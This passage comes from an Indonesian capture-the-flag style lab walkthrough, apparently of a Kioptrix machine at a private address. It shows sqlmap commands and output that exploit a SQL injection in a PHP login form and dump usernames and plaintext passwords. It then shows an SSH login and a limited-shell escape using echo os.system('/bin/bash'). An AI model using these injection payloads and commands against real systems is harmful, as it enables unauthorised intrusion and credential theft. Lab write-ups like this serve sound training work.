[11:14:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:14:56] [INFO] testing MySQL
[11:14:57] [INFO] confirming MySQL
[11:14:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:14:57] [INFO] fetching database names
[11:14:57] [INFO] fetching number of databases
[11:14:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:14:57] [INFO] retrieved: 
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[11:15:02] [INFO] retrieved: information_schema
[11:15:02] [INFO] retrieved: members
[11:15:03] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql

[11:15:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'

[*] shutting down at 11:15:03

Kesimpulan :
dapat dilihat dari hasil tersebut telah didapatkan database information_schema, members dan mysql. Sepertinya database members begitu menarik perhatian. Oke, selanjutnya coba masuk database members.
8. Jalankan perintah dibawah ini : (pada bagian ini akan saya tampilkan sampai masuk ke dalam table dan melihat username dan password.)

killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 -D members --tables
[sudo] password for killu: 
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201604230a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:21:38

[11:21:38] [INFO] testing connection to the target URL
[11:21:38] [INFO] heuristics detected web page charset 'ascii'
[11:21:38] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:21:38] [INFO] testing MySQL
[11:21:38] [INFO] confirming MySQL
[11:21:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:21:38] [INFO] fetching tables for database: 'members'
[11:21:38] [INFO] fetching number of tables for database 'members'
[11:21:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:21:38] [INFO] retrieved: 
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
1
[11:21:58] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+

[11:21:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'

[*] shutting down at 11:21:58

killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3 -D members -T members --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201604230a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:22:27

[11:22:27] [INFO] testing connection to the target URL
[11:22:27] [INFO] heuristics detected web page charset 'ascii'
[11:22:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-7775' OR 1477=1477 AND 'InhH'='InhH
---
[11:22:27] [INFO] testing MySQL
[11:22:27] [INFO] confirming MySQL
[11:22:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[11:22:27] [INFO] fetching columns for table 'members' in database 'members'
[11:22:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:22:27] [INFO] retrieved: 
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[11:22:29] [INFO] retrieved: id
[11:22:29] [INFO] retrieved: username
[11:22:29] [INFO] retrieved: password
[11:22:30] [INFO] fetching entries for table 'members' in database 'members'
[11:22:30] [INFO] fetching number of entries for table 'members' in database 'members'
[11:22:30] [INFO] retrieved: 2
[11:22:30] [INFO] retrieved: 1
[11:22:30] [INFO] retrieved: MyNameIsJohn
[11:22:31] [INFO] retrieved: john
[11:22:31] [INFO] retrieved: 2
[11:22:31] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[11:22:32] [INFO] retrieved: robert
[11:22:33] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[11:22:33] [INFO] table 'members.members' dumped to CSV file '/root/.sqlmap/output/192.168.56.117/dump/members/members.csv'
[11:22:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.117'

[*] shutting down at 11:22:33

Kesimpulan :
perhatikan bagian ini =>

+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

username dan password telah didapatkan.
9. Selanjutnya coba login ke dalam halaman web.
DeepinScreenshot_select-area_20200103002739
DeepinScreenshot_select-area_20200103002813
SUKSES..
10. Sekaranng coba masuk ke ssh john dengan password yang telah ditemukan tadi.

ssh john@192.168.56.117

DeepinScreenshot_select-area_20200103003317

perintah

echo os.system('/bin/bash')

adalah untuk mengeluarkan user dari pembatasan akses karena limited shell.

  1. Silahka coba ke ssh robert.

GOKIILLL Semoga bermanfaat dan jika ada kesalahan dalam penjelasan tolong komen ya. Saya juga manusia yang bisa salah. Mari belajar bersama-sama. ^_^

Akhmad Syarif

i just want to be myself

Recommended for you

No results for your search, try something different.